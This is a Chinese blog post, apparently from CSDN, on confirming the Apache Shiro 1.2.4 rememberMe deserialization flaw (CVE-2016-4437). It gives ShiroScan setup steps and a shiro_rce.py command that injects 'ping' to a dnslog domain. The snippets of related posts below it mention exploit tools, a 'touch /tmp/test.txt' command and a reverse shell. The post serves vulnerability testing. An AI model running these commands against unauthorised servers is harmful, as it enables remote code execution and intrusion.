简单的Shiro 1.2.4反序列化漏洞验证

最新推荐文章于 2024-07-18 12:50:53 发布
最新推荐文章于 2024-07-18 12:50:53 发布
阅读量6.1k 收藏 6
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Bubble_Mask/article/details/104403640
版权

前段时间的复测工作中碰到了,后来也有人来问我怎么做其实这并不难测,大佬们都有自己的方法,问了也是让自己百度自己想办法,然而我第一次碰到的时候仍花了很长时间于是提供一种简单快捷的检查方法,如果帮到你了就给文章点个赞吧~

原理什么的就不讲了,直接正题

用这个工具:https://github.com/sv3nbeast/ShiroScan

建议下到windows。需要python3环境。

之后进入文件夹,打开shiro_rce.py,增加如下几个模块:

import os

import re

import base64

import uuid

import subprocess

import requests

from Crypto.Cipher import AES

其中requests和Crypto是第三方库,需要另行安装

pip install requests

Crypto这个库比较邪门。。我用pip install直接安装会各种报错

于是我先卸载掉

pip uninstall Crypto

pip uninstall Cipher

然后装这个

pip install pycryptodome

需要一个dnslog平台,我用的是http://www.dnslog.cn/

cmd下进入ShiroScan的目录

python shiro_rce.py url "ping 4v7o2m.dnslog.cn"

URL就是要测试的目标地址。执行后,回来refresh下看看是否记录了该域名的dns查询记录,即证明目标是否存在命令执行。有,就说明存在漏洞

Bubble_Mask
关注
Apache Shiro 1.2.4反序列化漏洞(Shiro-550)--Shiro rememberMe反序列化漏洞(CVE-2016-4437)
薛定谔嘚喵博客
05-10 1563
Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。
apache shiro 1.2.4反序列化漏洞
ggzhifeng的博客
11-04 904
Apache Shiro 简介 Apache Shiro 是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,您可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。 漏洞成因 Apache Shiro 反序列化漏洞的主要成因是 shiro 在进行 remember me 操作时,将用户信息序列化后加密存储在c...
Shiro RememberMe 1.2.4 反序列化漏洞详细复现
weixin_38166689的博客
08-07 2150
0x00 前言 今天上班的时候收到了一个复测的任务,打开一看,shiro反序列化漏洞,What?这是个什么东西,经百度查找后才知道,原来是Java的开发框架,好吧,还是没听说过。。由于初测报告上的过程过于简略(唯一有用的只有KEY),所以不得不自己研究一番了。 0x01 环境搭建 漏洞版本<=1.2.4,使用docker搭建 docker pull medicean...
shiro反序列化漏洞利用工具
11-09
图形化界面,该工具支持漏洞检测,请勿用作非法途径,否则后果自负。 Shiro550无需提供rememberMe Cookie,Shiro721需要提供一个有效的rememberMe Cookie 可以手工指定特定的 Key/Gadget/EchoType(支持多选),如果不指定会遍历所有的 Key/Gadget/EchoType 复杂Http请求支持直接粘贴数据包 pic1
反序列化-Shiro-550详细分析
最新发布
鸣蜩十四的博客
07-18 1199
Shiro-550漏洞是攻击者直接就可以用密钥实现框架加密过程,在Cookie字段写入想要服务端执行的恶意代码,最后服务端在对cookie进行解密的时候(反序列化后)就会执行恶意代码
shiro反序列化漏洞暴力破解漏洞检测工具
09-14
文件内包含内容如下: 1.shiro反序列化漏洞、暴力破解漏洞检测工具源码 2.shiro反序列化漏洞、暴力破解漏洞检测工具jar包 3.shiro反序列化漏洞、暴力破解漏洞检测工具启动方法 4.shiro反序列化漏洞、暴力破解漏洞检测工具使用方法 5.shiro反序列化漏洞、暴力破解漏洞修改方法
Shiro 1.2.4反序列化漏洞
jxy158212的博客
02-24 765
Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。
Shiro反序列化漏洞【详细解析】
m0_67392126的博客
08-30 1491
硬编码要求程序的源代码在输入数据或所需格式发生变化时进行更改,以便最终用户可以通过程序外的某种方式更改细节。
反序列化漏洞验证:unserialize反序列化
zh的博客
10-16 509
靶场地址:http://www.whalwl.site:8026/ 解题准备:了解unserialize函数 解题思路: 1、将靶场提示代码搭建成网页,手动添加 $obj=new site(); echo serialize($obj); 2、访问网页获取反序列化后的字符串 使用dage参数传递反序列化字符串,尝试各种危险函数,最后assert成功了 3、 POST方式提交dage,执行ls命令,得到flag文件名 dage=O:4:"site":3:{s:3:"url";s:
Apache shiro1.2.4反序列化漏洞介绍.docx
07-01
然而,在Apache Shiro 1.2.4及其更早的版本中,存在一个严重的反序列化漏洞。这个漏洞主要与RememberMe服务的实现有关。在处理RememberMe的Cookie时,Shiro的`CookieRememberMeManager`类会执行一系列操作:首先,它...
Apache Shiro 1.2.4反序列化漏洞
m0_53603468的博客
12-22 278
第二天总结 概述 今天我们复现了Apache Shiro 1.2.4反序列化漏洞(CVE-2016-4437)这一漏洞。Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。 之后去了解了什么是序列
两款好用的shiro检测漏洞工具 ShiroExploitV2.5.1 和 shiro-attack-2.2,jdk8亲测可用
12-16
简单好用,傻瓜式一键检测漏洞,内置大量公开key,输入地址即可进行检测。 内容包括:1:ShiroExploit.jar、ysoserial.jar、config 2:shiro_attack-2.2.jar、data 使用方式:对应路径java -jar执行jar包
shiro反序列化复现.zip
08-03
shiro反序列化复现工具包;shiro反序列化复现工具包;
ShiroScan:Shiro RememberMe 1.2.4反序列化入侵图形化检测工具(Shiro-550)
03-18
Shiro反序列化检测工具 ShiroScan用于检测存在四郎反序列化漏洞的关键值。有三种方式进行检测,第一种是利用URLDNS进行检测,第二种利用命令执行进行检测,第三种使用SimplePrincipalCollection序列化后进行检测(XCheck ,即X光检查)。 功能简介 默认DNSLOG 选择后会调用dnslog.cn的接口,生成一个域名,进行检测后,结果会输出在结果区域。 选择该选项时, dnslog.cn卡顿,正在从dnslog.cn获取dnslog.cn ,并显示。 自定义DNSLOG 需要自己输入一个dnslog地址,进行检测后去输入的dnslog平台去查看结果 使用URLDNS 利用URLDNS进行检测。 参考: : 使用有效载荷 通过执行ping命令来检测。 使用XCheck 通过使用SimplePrincipalCollection序列化来进行检测,key正
Apache Shiro 1.2.4反序列化漏洞复现
weixin_43223153的博客
06-10 408
Apache Shiro 1.2.4反序列化漏洞复现 1. 环境搭建 安装漏洞靶场vulhub git clone git://github.com/vulhub/vulhub.git 下载安装ysoserial 项目源地址:https://github.com/frohoff/ysoserial jar包下载地址:https://jitpack.io/com/github/frohoff/ysoserial/master-d367e379d9-1/ysoserial-master-d367e379d9-
渗透系列之shiro反序列化漏洞检测及案例操作流程
Websec
09-15 7032
参考开源工具即可: https://github.com/feihong-cs/ShiroExploit 原文如下: ShiroExploit 支持对Shiro550(硬编码秘钥)和Shiro721(Padding Oracle)的一键化检测,支持多种回显方式 使用说明 第一步:按要求输入要检测的目标URL和选择漏洞类型 Shiro550无需提供rememberMe Cookie,Shiro721需要提供一个有效的rememberMe Cookie 可以手工指定特定的 Key/Gadget/
记一次shiro反序列化漏洞验证的坑
weixin_45523692的博客
04-07 852
记一次shiro反序列化漏洞验证的坑引言原理影响版本特征判断过坑过程发现可疑目标脚本测试继续搞 引言 工作中接触到shiro反序列化漏洞,看了看原理, 原理 Apache Shiro框架提供了记住密码的功能(RememberMe),用户登录成功后会生成经过加密并编码的cookie。在服务端对rememberMe的cookie值,先base64解码然后AES解密再反序列化,就导致了反序列化RCE漏洞。 那么,Payload产生的过程: 命令=>序列化=>AES加密=>base64编码=&gt
Apache Shiro漏洞检测(CVE-2016-4437)
初学者L_言的博客
01-20 1067
一、环境 1.1 环境搭建 vulhub搭建 【注: 此博客只做学习记录,原理请自行百度**】** 这里贴一篇吧 1.2 工具 python版本:https://github.com/insightglacier/Shiro_exploit 二、操作记录 2.1 执行 touch 命令 # 在 /tmp 目录下 创建 test.txt python2 shiro_exploit.py -t 3 -u http://192.168.47.162:8080 -p "touch /tmp/test.txt"
Shiro漏洞工具的使用
m0_67403240的博客
04-22 1010
文章目录 01 下载ShiroExploit.V2.3,并运行.jar 02 运行后的界面 03输入测试的url 04 选择检测方式 05 判断是否存在漏洞的依据 06 反弹shell 01 下载ShiroExploit.V2.3,并运行.jar 在github上直接搜索下载 有源码,可以自己编译成.jar 02 运行后的界面 Shiro550无需选择操作系统类型, Shiro721需要选择操作系统类型 复杂Http请求支持直接粘贴数据包 03输入测试的url 可以自己直接
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值